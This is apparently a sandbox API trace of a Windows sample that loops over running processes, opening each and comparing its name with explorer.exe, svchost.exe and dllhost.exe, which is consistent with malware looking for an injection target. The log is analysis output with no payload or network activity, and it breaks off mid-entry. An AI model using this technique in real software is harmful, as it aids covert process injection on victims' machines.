[0250.177] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0250.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0250.178] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.178] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.178] CloseHandle (hObject=0xec) returned 1 [0250.178] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0250.178] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0250.178] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0250.178] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0250.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0250.179] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.179] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.179] CloseHandle (hObject=0xec) returned 1 [0250.179] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0250.179] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0250.179] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0250.179] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0250.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0250.179] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.179] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.179] CloseHandle (hObject=0xec) returned 1 [0250.179] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0250.179] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0250.179] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0250.179] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0250.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0250.180] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.180] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.180] CloseHandle (hObject=0xec) returned 1 [0250.180] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0250.180] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0250.180] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0250.180] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0250.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0250.181] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.181] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.181] CloseHandle (hObject=0xec) returned 1 [0250.181] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0250.181] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0250.181] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0250.181] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0250.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0250.181] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.181] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.181] CloseHandle (hObject=0xec) returned 1 [0250.181] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0250.181] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0250.181] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0250.181] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0250.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0250.182] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.182] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.182] CloseHandle (hObject=0xec) returned 1 [0250.182] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0250.182] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0250.182] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0250.182] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0250.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0250.183] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.183] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.183] CloseHandle (hObject=0xec) returned 1 [0250.183] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0250.183] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0250.183] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0250.183] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0250.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0250.183] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.183] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.183] CloseHandle (hObject=0xec) returned 1 [0250.183] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0250.183] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0250.184] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0250.184] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0250.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0250.184] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.184] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.184] CloseHandle (hObject=0xec) returned 1 [0250.184] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0250.184] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0250.184] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0250.184] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0250.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0250.185] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.185] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.185] CloseHandle (hObject=0xec) returned 1 [0250.185] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0250.185] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0250.185] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0250.185] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0250.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0250.185] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.185] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.186] CloseHandle (hObject=0xec) returned 1 [0250.186] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0250.186] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0250.186] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0250.186] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0250.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0250.186] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.186] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.186] CloseHandle (hObject=0xec) returned 1 [0250.186] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0250.186] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0250.186] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0250.187] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0250.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0250.187] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.187] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.187] CloseHandle (hObject=0xec) returned 1 [0250.187] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0250.187] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0250.187] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0250.187] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0250.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0250.188] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.188] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.188] CloseHandle (hObject=0xec) returned 1 [0250.188] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0250.188] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0250.188] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0250.188] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0250.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0250.188] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.188] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.188] CloseHandle (hObject=0xec) returned 1 [0250.189] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0250.189] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0250.189] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0250.189] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0250.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0250.189] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.189] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.189] CloseHandle (hObject=0xec) returned 1 [0250.189] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0250.189] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0250.189] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0250.189] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0250.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0250.190] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.190] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.190] CloseHandle (hObject=0xec) returned 1 [0250.190] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0250.190] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0250.190] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0250.190] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0250.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0250.190] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.190] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.191] CloseHandle (hObject=0xec) returned 1 [0250.191] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0250.191] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0250.191] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0250.191] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0250.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0250.191] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.191] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.191] CloseHandle (hObject=0xec) returned 1 [0250.191] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0250.191] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0250.191] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0250.191] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0250.192] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0250.192] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0250.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0250.193] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0250.193] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0250.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0250.194] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0250.194] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.194] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.194] CloseHandle (hObject=0xec) returned 1 [0250.195] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0250.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0250.195] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.195] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.195] CloseHandle (hObject=0xec) returned 1 [0250.195] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0250.196] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0250.196] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.196] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.196] CloseHandle (hObject=0xec) returned 1 [0250.196] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0250.196] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0250.197] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.197] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.197] CloseHandle (hObject=0xec) returned 1 [0250.197] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.197] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0250.198] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.198] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.198] CloseHandle (hObject=0xec) returned 1 [0250.198] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0250.198] CloseHandle (hObject=0xe8) returned 1 [0250.198] Sleep (dwMilliseconds=0x3e8) [0251.200] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0251.202] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0251.202] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0251.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0251.203] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0251.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0251.204] 